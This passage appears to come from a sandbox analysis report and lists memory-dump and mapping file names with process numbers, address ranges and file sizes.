-
memory/5636-649-0x0000000004C90000-0x0000000004F16000-memory.dmpFilesize
2.5MB
-
memory/5648-329-0x0000000000000000-mapping.dmp
-
memory/5688-265-0x0000000000000000-mapping.dmp
-
memory/5708-266-0x0000000000000000-mapping.dmp
-
memory/5708-275-0x0000000001310000-0x0000000001312000-memory.dmpFilesize
8KB
-
memory/5724-358-0x0000000000000000-mapping.dmp
-
memory/5728-350-0x0000000000000000-mapping.dmp
-
memory/5756-330-0x0000000000000000-mapping.dmp
-
memory/5756-341-0x0000000001330000-0x0000000001340000-memory.dmpFilesize
64KB
-
memory/5756-343-0x0000000002B00000-0x0000000002B12000-memory.dmpFilesize
72KB
-
memory/5792-274-0x0000000000000000-mapping.dmp
-
memory/5836-276-0x0000000000000000-mapping.dmp
-
memory/5836-281-0x00000000000A0000-0x00000000000A1000-memory.dmpFilesize
4KB
-
memory/5852-560-0x00000000048F0000-0x000000000499B000-memory.dmpFilesize
684KB
-
memory/5852-559-0x0000000004760000-0x000000000483D000-memory.dmpFilesize
884KB
-
memory/5856-305-0x0000000002930000-0x0000000002931000-memory.dmpFilesize
4KB
-
memory/5856-327-0x00000000026C0000-0x00000000026C1000-memory.dmpFilesize
4KB
-
memory/5856-336-0x0000000006A30000-0x0000000006A31000-memory.dmpFilesize
4KB
-
memory/5856-331-0x0000000006330000-0x0000000006331000-memory.dmpFilesize
4KB
-
memory/5856-299-0x0000000000570000-0x0000000000571000-memory.dmpFilesize
4KB
-
memory/5856-335-0x0000000005020000-0x0000000005021000-memory.dmpFilesize
4KB
-
memory/5856-313-0x0000000002670000-0x00000000026AE000-memory.dmpFilesize
248KB
-
memory/5856-278-0x0000000000000000-mapping.dmp
-
memory/5900-524-0x0000000000550000-0x000000000057F000-memory.dmpFilesize
188KB
-
memory/5900-347-0x0000000000000000-mapping.dmp
-
memory/5904-506-0x0000000003560000-0x0000000003561000-memory.dmpFilesize
4KB
-
memory/5936-349-0x0000000000000000-mapping.dmp
-
memory/5936-359-0x000000001B530000-0x000000001B532000-memory.dmpFilesize
8KB
-
memory/5944-284-0x0000000000000000-mapping.dmp
-
memory/5948-368-0x0000000000000000-mapping.dmp
-
memory/5976-285-0x0000000000000000-mapping.dmp
-
memory/5988-579-0x0000000004E00000-0x0000000004EAB000-memory.dmpFilesize
684KB
-
memory/6008-288-0x0000000000000000-mapping.dmp
-
memory/6008-298-0x00000000002F0000-0x00000000002F1000-memory.dmpFilesize
4KB
-
memory/6008-309-0x0000000002410000-0x0000000002411000-memory.dmpFilesize
4KB
-
memory/6016-405-0x0000000000700000-0x0000000000701000-memory.dmpFilesize
4KB
-
memory/6044-558-0x00000000008B0000-0x00000000008B1000-memory.dmpFilesize
4KB
-
memory/6136-418-0x0000000005470000-0x0000000005471000-memory.dmpFilesize
4KB
-
memory/6136-360-0x0000000000000000-mapping.dmp
-
memory/6940-658-0x0000000000ED0000-0x0000000000EE0000-memory.dmpFilesize
64KB
-
memory/6940-659-0x0000000000EF0000-0x0000000000F02000-memory.dmpFilesize
72KB